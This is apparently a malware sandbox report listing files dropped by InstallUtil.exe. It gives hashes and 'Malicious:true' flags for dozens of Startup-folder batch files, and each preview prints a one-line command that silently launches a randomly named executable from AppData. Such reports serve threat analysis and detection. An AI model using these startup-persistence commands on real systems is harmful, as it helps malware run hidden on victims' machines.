                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.995224760012762
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5/VX/BjTtEwfiACl:fE1923NhTtZ+l
                                                                                                                          MD5:7798C506F8826252FB0385CA382D7ABA
                                                                                                                          SHA1:F23CB0B34F07B9EA770ABAD1061E757D28351E80
                                                                                                                          SHA-256:74124007749F134915483E78B108A8029104CAA53D90BCFCFB15A26DCA01ED5B
                                                                                                                          SHA-512:D10EFA165055B70FB5F9654404FFFE0E5D8CF28746F54BADC114D19E6BF60FAE72D7F11CFF260A99C6F9AA7C6ADEEFD081433D86DA102738CF85E57E34922AB4
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\ZT6AzWxWIFXd7OjNGkbd7Uza.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\klA8JmAQ7d3aYJKSY8AQnRqN.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.816564225345956
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5AkFROF:fE1923AkO
                                                                                                                          MD5:DE3DD25C488A6F9558E8ED66EB12AE65
                                                                                                                          SHA1:B83E174760B842973EBCA81F629CDA4E850C7D4A
                                                                                                                          SHA-256:3B654B476D535AB2E1D75B4F4491D00F141AEEEA56834764FD163307056485FD
                                                                                                                          SHA-512:A5657C11F638092E441221458AFDC95335CDFDF7CD7B689FD77DBA326D8E03421F954744781CD2CE3CF8C6D3BD6EA24EE43C4AD2EAD274E10B02C8303213F5B4
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\esF1MUrWaaVP5MG9h4MWEG3L.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4gvHRByQBP5m6HuFN5n1qeo.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.878914625011674
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5E2VqtkDJjOvgm:fE1923E2Vq0Cvn
                                                                                                                          MD5:8E1E9220B1C028544200085795CF61B9
                                                                                                                          SHA1:EB623EE420E1F3820636EBD1125807C064826221
                                                                                                                          SHA-256:D7FC16CED8A081DB0D28C907981E03FB6DD21C300574592BC08D46D3B710D83C
                                                                                                                          SHA-512:B973DF6F531E296551F288E47A6B53A726A46FDECD1A5DE02F27D286BAD102D7AB0B459AD07F8A4D3917A5F9FD1CFFFBD6FD75F1A78ED09F81B004EC27266DDB
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\aSvR4wbbpHKmaflFz1ztlj53.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lNPfzNqweDyCrBqs3aG9H3ld.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):4.873233449163487
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5JWsda89fEykdan:fE1923bda8ZEyD
                                                                                                                          MD5:529058FEB3394BF5BA07D44ADD62D4BF
                                                                                                                          SHA1:D3C123AA2A965ECFC9687DB212E3C246549A7AE8
                                                                                                                          SHA-256:85AC38E0DA80A8F9F1FBDEFDD17E8C4B130655C4135FDD6D5A12CB4A7F908612
                                                                                                                          SHA-512:C5DE8827A8E44057E720A980473516F79ACCCEBA169F727A2DB0AE3F2395500727A43E4393E615E9A4DAAF67AEB7F02B4F1AF38D7A76F4917FA26575DEF0A352
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\lsTOGQhYLrM0d7OftxaupYqW.exe" --silent --allusers=0

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mIcfPToLUPq3gj5WqJxRDBbR.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.867301639407289
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5rWauO/prfURMqLAEFn:fE1923SN
                                                                                                                          MD5:B9BD2332B9C2169782E1FD7CEDCD623E
                                                                                                                          SHA1:21FA4DB7C11DC8EB7FF762EB9BE6A6B61CF38B06
                                                                                                                          SHA-256:8E543F8F3F26BE9E4E0A6F3CF4524D7F248A07CAE19BA465F1DD96E9D91C5409
                                                                                                                          SHA-512:20E4A88F9EF39421B778A46A1BB81014A794065B266BDE2A0506F7E5FCC5812393F0CFBC181D7F54BB81D073809FF25B65D175066C790C6DFC8B5614AF3227B7
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\N3UpPkceW0KxiJBLNKuqtisH.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mQAC01IWkyy1VpnNHreKqDP9.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):4.862667201707329
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5CUrdorwjddRsOL4iykdan:fE1923CUScdRTVyD
                                                                                                                          MD5:3143B2A6AD3F55F60D873FF4E144441F
                                                                                                                          SHA1:BD607A145243C9097BED457739BBAD45C0E7E218
                                                                                                                          SHA-256:A50A4404CED446D786BC305E280793CB34535CBDA88EBF6DF3D83D73722102D1
                                                                                                                          SHA-512:BEC12E3738716E37EBA7C4B57FB42764653E6EBE522E3B1773256263C34FCA6A670D4B4044FE435A49534A157D15F151101834973CDB252E2583280B42464CC5
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\gqqSecZ0iDGmpNUFqal8ttIk.exe" --silent --allusers=0

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mYqDdzubQoYo0UMqzcaWhlCq.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.943658467520809
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5qXNPI0rXB:fE1923qXNHDB
                                                                                                                          MD5:6102D91461A2F91BC012B814489318CE
                                                                                                                          SHA1:E5DF3DBADBF45FC113C65E4933ABAF46E5E26778
                                                                                                                          SHA-256:7291F4605E48817D9B1B997B2AAA325D714144BA32ACED0D55DBEE8F241A67F2
                                                                                                                          SHA-512:747F3EA4A3A3D685DB73ED763C55978C1497ED3F3D3387B1B0A41B8B49B668E7E5502FCA27459C7BBB7139D4708556FD529BE047478DD348B778821D585D1E6F
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\OVpl7ZoSx7d60PF3UKl2AN2h.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n5FvfFJp0xTBHsTUd1HtVjgf.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):4.984504844977474
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5zU1ZmnAdL4AHykdan:fE1923A8ATSD
                                                                                                                          MD5:043B1D7A07B1040067832318F3DEE910
                                                                                                                          SHA1:A30158EC0D4960C74377DD457656E4FE6F186602
                                                                                                                          SHA-256:3B8CED94BCD8F9179AC038F857BD3A87BA4BEB2430F176234BE7813E4A1D0C83
                                                                                                                          SHA-512:076810D4F60A63CB9270483BE3233B958EFBDEF10A4B6457A656913EC69163E44F7F80C222C7FA82C57E6BE315FB672C20E0B64E43697E5E5B0EF866488E87F7
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\VtYWoqhIxv66SdBYR6iCW9pR.exe" --silent --allusers=0

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nJ0fjaFyPdUTkd27RbJpgLbV.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.84716007463276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5QxPyujMAfLmYl:fE1923QJ1FLm+
                                                                                                                          MD5:1ABACAA0BFA8DFBC0F891EB4FA510EB7
                                                                                                                          SHA1:BF829CB4139BDF3FC4893436D5BC6A46258901F0
                                                                                                                          SHA-256:1B57F904563098D73133645D27DCB8D51A82763033F0AE79F3BD55C07581333A
                                                                                                                          SHA-512:54C4C540DA745B2EB6BCD833508C880C677BD752EDBB3581615FAC518EA87934230BEA882F73CD5408A76A7510425A95AE159C4D7E1E545FA1C359832F0B761A
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\5TjWUMIFlYsM1w3seMz5vnCW.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nnz2eQ1k1PBdAfnlioMuMIp1.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.794996010998428
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5dBbALgQjnpmn:fE1923Dk1pm
                                                                                                                          MD5:13F076DF513488ABC40885793AB3DAD1
                                                                                                                          SHA1:60C603DD32E95D44B4BBE6714EBF1E24FA717B05
                                                                                                                          SHA-256:5CE482C0B2C7C112209F69F6617ADDAC069469BAF359B4D4D2FD6876C20FEBBB
                                                                                                                          SHA-512:51CB4995D6F637EE323F6E1527A46A0748788A424CDE3A7BFB89C2DFF15CD7CD44CEDED01402DD443F192879DA0F917B07BDADBABB9947238D686A9795F53AB2
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\xdeUkahxXV0peWYvEuaoQ5lY.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\o9mC5xW9tKlp4kRcY0ENXFVx.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.918270160756866
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5o/eGCAWCHF:fE1923oVzF
                                                                                                                          MD5:168803972173167D2D1ACBFCBD4BE08B
                                                                                                                          SHA1:A8A534D493B390F64A6B1BAF86011F439E1986E7
                                                                                                                          SHA-256:52C0AE26E763E64E1EABFAC8BA415C05714B67D32BE2DD1D472601C66B82928E
                                                                                                                          SHA-512:92D345D965D5B8B9E1574E33AC5C1C7468DBEBD1B1819A3E35293693F6F25D38D0976EDB9F114EFD4D5C1C71109E329D869D7625FF3C840F0520E0770291C2D0
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\MZK43d4eyhmNVFNhS9RLdaaU.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oEONzKus0KJmxBw4v3Njwzwg.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):4.979293717893194
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J50/aqB/dxFIkdan:fE19230/aqB/dUD
                                                                                                                          MD5:8211E84D96EDE20ED3BE9C2AA46A44D1
                                                                                                                          SHA1:74702DC788CE82AB89163D2EFF358B397C371F3C
                                                                                                                          SHA-256:CBA88D797873C7DDCF7796536FFD92552B48DC2BAC7723DFD98A79424DEC9024
                                                                                                                          SHA-512:F92D6BEEAA44E3351EB491D82378F5B58AB06D0D6484156D5FC7576B854491C246DCE79A38D7995DB9EF6E638A753349A9FF9E4B7BFAD48F50299687B1062D59
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\Q8fp1UEXdipsRABJgu0jdZxz.exe" --silent --allusers=0

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oNjbvmMzdD4XPQKq54zqlNic.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.893518824601853
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5dneB9peGAs:fE1923leReGAs
                                                                                                                          MD5:C8B2A3E7C06F59FC65395C6AE268917A
                                                                                                                          SHA1:7A42EC54609BB0FBC70D6F4268F3F9233785C9B3
                                                                                                                          SHA-256:733B6F72B0C32D7B9D1CD6264741ED94A4F01FEC69BE1C950A95213707B63F78
                                                                                                                          SHA-512:E6A3E03F52DA66398962EE6BBC04E0C9DB41BFA9AD760447B7A1A8F4B017AE13B003DE6352FAD141F6AAAD5782D06C18D1974BC115A77BF6106CB615496B75B7
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\xBkTzUdEhVpjUVzIbl9rLudD.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ocJg40zsLJKmhTN6I8MsqjRk.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.920663603600285
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5dQmABq0dAln:fE1923Vh0s
                                                                                                                          MD5:9F0AFAAB00105FFFADB5FFF5BF72438A
                                                                                                                          SHA1:0CE554001505BA90B110FBBFF2A5D4A399B66B72
                                                                                                                          SHA-256:F55D2037618EE116FBACE30D06D9A34B101181FFE3CB32C5EED08DA6AED4F488
                                                                                                                          SHA-512:ED7ACBCAEEBE11662757BC8D0D121EF89DC2D864F6A428B4F9229FD409B976735DB8888B0CF428E0E2ADE9B040C604F8909DC23B84F0159CF9203DC065464F4A
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\85Chwg9AW94Pql4pyXLsUn7O.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rxQ6BYkPciRzcYhkKHNbCVXz.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.029372753235095
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5SIUxjvFtL:fE1923Slxxh
                                                                                                                          MD5:3F1159BF07156F57FF7F74A93F2B123B
                                                                                                                          SHA1:636D5274E554E794AE616018355CADDBE5DE7F76
                                                                                                                          SHA-256:14D669D71874723772C44A2AD6F5BCE40F45D7A01AA7A06FD332891836DF1DCD
                                                                                                                          SHA-512:1B5C5C361FDC27C2C23A4432D6872673921D84D5F300294103630E33637DCE38717F6EE364CBE53BAD81C5875EF845E41B8BFA4EC34C7A63EF7FEF82DD71DC7A
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\wX1CP74iAAUoTFJQYBTP9Zvu.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\suhoeipyv9Q7WtMqEht6w8l1.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):5.01988155870136
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J587BMNIIT1sOQACSkdan:fE192387aII5XD
                                                                                                                          MD5:03203351993BCB4BFFD1EFD0993F45AF
                                                                                                                          SHA1:FA13024EADDEA7F2B481CFAE1A492A71C9193F5D
                                                                                                                          SHA-256:92A60C76DDB08D49DB32F1374AA65B053E9FD83D6D18F36E6B26E238CE06FDD2
                                                                                                                          SHA-512:AE0F1D13ECFE9AE464BAFBF987D43F1BD7CF87A7B5EDCC170E454AAAEE9059E75F15D1C3E65CFBAFC0A7FA93C5214CACBE9BB98A02502704F7642C0A5B56EBEB
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\Y4LnHhMyiOb93nCmM4lvPIko.exe" --silent --allusers=0

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tOLiiaY6ffsKgwiVZfFcFIn0.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.897299717551715
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5VyEjZWt/LAEFn:fE1923/k/0EF
                                                                                                                          MD5:D1D2FBFF2E1C244312337F62C37BF309
                                                                                                                          SHA1:6601EAF4C50F777FF1A3A3CD672C65A481DF7953
                                                                                                                          SHA-256:1E5CBEF5C96790119A24DA000FDFF98FC99282CCFED0AA585B844AF6622DB1CA
                                                                                                                          SHA-512:DBF835880C2C6A2175AD8082CB0BA2AB77BAC39115826FC20360CF6DE33251BB5624844B0345D7961A314DAD55ABD3C24201DD172137707A628CDF9EB7D415A1
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\0Wr1nNnwPmwWrctj4jhBOWiY.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tUicDr528bg57zTahAKCbWLd.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.719236954027286
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5QZ/Dl9nWMl:fE1923Q1Xhl
                                                                                                                          MD5:9BC6297C015280FED4B2C3D896E2631D
                                                                                                                          SHA1:19A54DBAD8C8BC3B509D735F44D758819C29B1E5
                                                                                                                          SHA-256:555D8F7390083B596EE8E88CFB1F164327443C9F8FF259D86B73AEE920E2F4B7
                                                                                                                          SHA-512:33F19C1F2F044F5623FBE3FBF17D21F660ADA9F509CA9DE6DDEE47A63B883EA6FB6C91E9F1D23725F6638057BAFBE8624F5C4968B940012EC66F530AC442A3EE
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\53tlSJicrflVnn9iBsteA9ZP.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uHMiBvdm9CkTFYr0icYjiahN.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.767022353569377
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5RGcyk3ygOhjl:fE1923ZHyd1l
                                                                                                                          MD5:68E4A71297CAB243FE3644FF32A4579D
                                                                                                                          SHA1:61E02FF67B9044ADEC00F072A9AAE3504DD0FB7E
                                                                                                                          SHA-256:09EB44A7A89617F2003ADD5A421A76FA7D81F86AE1DB333F7E6E4B3EB7554CDA
                                                                                                                          SHA-512:387F2433827B9A61F0D64BA997A649497F2EE9B2B215F06D6D9A9923780D43023CAD3B9BCAB8503B5AAC93D10F0070DB4C1DDDE4F242C31A2DA95FB3B373DF56
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\tcyRy6ARtqpoDWzM7VLf6fDh.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vM0i9O3SmyJMeySMU7pfuQYS.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.961445788918474
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5QIzWNVF:fE1923QTNVF
                                                                                                                          MD5:88401F75C9C7A724CDC00006F827B8FA
                                                                                                                          SHA1:775F23230A1516F58132898452C06DD190F587F6
                                                                                                                          SHA-256:99F18CE63BF6AF2FD80AF9F1BDA04E255524C1A8A958E33B58B81067447F6FBB
                                                                                                                          SHA-512:FA62020D54D3BBFB825BB4A62F85008D34267E684D598697CE9FC0A4842A402CB5AFA94631074856EBE929B3A2083D5F2A379D3197B1B1ABD47C11251364F39E
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\u47GFmiT4x96ZGJgiflf2j9o.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wWETG3CiojJKDjCsayXNSC4C.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.852736639283663
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5pD0blQcwnnFn:fE1923tulQBnF
                                                                                                                          MD5:4B9C4FE1AE8D632F37473FA56B3FDDF6
                                                                                                                          SHA1:3D229955F31637C2E9817B947CBB437317A8548B
                                                                                                                          SHA-256:8D190736B21A58D68B9DAEF2ECC2FE69DE81AF66B0AF960BDA1559954D3F1F05
                                                                                                                          SHA-512:C0EB269DA8024FD0CF4599C9F6F57B43CEB3F5E009F7D1CD0C5B6876D788B86389BEA22075E2DC4F7B1C752CF8172CD3540124ECD38242F9026EB74EBAEA5CB2
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\LfQ6AcJl79u70uyUOmZMpsO7.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wahfCAc9rxN7QFp93csP92wp.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.000801324663666
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5o29ewdm:fE1923o29nm
                                                                                                                          MD5:1ED00605B3CED24570B7F80C8E963585
                                                                                                                          SHA1:91066F0AA3CD0661FA2900D0D9446E00053AA854
                                                                                                                          SHA-256:BAEB5D95D9EEFECF4F4E785AD07CBE0E4DF9EB601D8717A636ACA7DCFEBB8BC8
                                                                                                                          SHA-512:39BD4A75BF22140A3E3FE5659FCFA45A3F60EC88448D625B97DAE746D0E7D473079F3165A3B4AB439641AA1895D8B82FE3625FCC0558FCCDB7B7848DF355DFCC
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\MiUHKxXX51Qbx03CZluTi3J9.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xl8GqJiSNyzMP1kcdxSKb1Bh.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.904302931775617
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5VRmOGifD/3PBdiF:fE19237qiL/PBs
                                                                                                                          MD5:197BDF445E2572E8A8B85863B9BD18C4
                                                                                                                          SHA1:8DE0F587886BBF3F4AF4E315003BC580E4FC686E
                                                                                                                          SHA-256:AFE03F481467187CEAC94DB94ACCD781735C5A6445D4AF889D93B172329985AB
                                                                                                                          SHA-512:439695AC8B013C07D6A354E94FD12F0E3F8B8CE98635E7EB3C1F8292B77599EBB1517CE131C79F966F1CB8C6783B18A21FC28D558FCDE06A1A62C135C7BC0C97
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\04gOIpVzf7VOcPzY7ZRrzAhZ.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z2ZokpX7yw3dNDZbk7sMnpTY.bat

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.904302931775617
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5UXfKkGFD4iDn6l:fE1923UXHGFDb6l
                                                                                                                          MD5:2404331E8E7E7F52979F85DFCAB2603C
                                                                                                                          SHA1:DF5725BABF6D18BDD65E3EAA28075F2CB8BB37AB
                                                                                                                          SHA-256:4DD105DF503711104EE70057A129D3CDD6588B21D8E32B075DF7BF67F1A8A8A4
                                                                                                                          SHA-512:634C3DADA338CF1CC0684CB29850086BC006315A88891AFD17E64D3BD7EB79580B3712C65A0AA82CC56644FC47702E5F8E4844A6E6D647BCB96A0224165744FD
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\qx9m66oAULRc7jSInMlGf6NE.exe"

                                                                                                                          C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40
                                                                                                                          Entropy (8bit):3.39546184423832
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:FkWXlw600Vbkn:9wCA
                                                                                                                          MD5:E69A84FE57CEDB46ED0786ECC9E8A15E
                                                                                                                          SHA1:43041CEE4851EEF0C688BD45B5F4DEFC689AD5CA
                                                                                                                          SHA-256:3705D66769528BB33FF6087443BB8A4D9B9D62DFE7377EFF696E53A58A03F89C
                                                                                                                          SHA-512:3682F7E84494AEED7C6AF7A5080F8E6AC6990E02500C1D5BAEF3D3C5E92B4A6A8257D18320F3CD312EF06890D846B103A3E924D4EA063D291E90FD0A993B7D92
                                                                                                                          Malicious:false
                                                                                                                          Preview:sdPC....................@LT...^B..0.x.c.

                                                                                                                          C:\Users\user\AppData\Roaming\Temp\Task.bat
